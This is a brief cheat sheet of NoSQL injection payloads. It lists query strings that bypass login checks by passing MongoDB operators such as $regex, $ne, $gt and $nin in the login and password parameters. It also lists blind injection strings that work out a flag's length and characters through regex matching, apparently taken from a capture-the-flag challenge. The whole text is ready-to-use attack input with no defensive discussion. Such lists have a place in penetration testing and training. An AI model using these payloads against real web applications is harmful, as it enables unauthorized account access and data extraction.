NoSQL Injections

Basic Authentication

index.php?login[$regex]=a.*&pass[$ne]=lol
index.php?login[$gt]=admin&login[$lt]=test&pass[$ne]=1


# Basic NoSQL Injection
http://url?login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto


Blind NoSQL Injection

# Get size
index.php ?chall_name=nosqlblind&flag[$regex]=.1

# Enumeration
index.php ?chall_name=nosqlblind&flag[$regex]=3a.20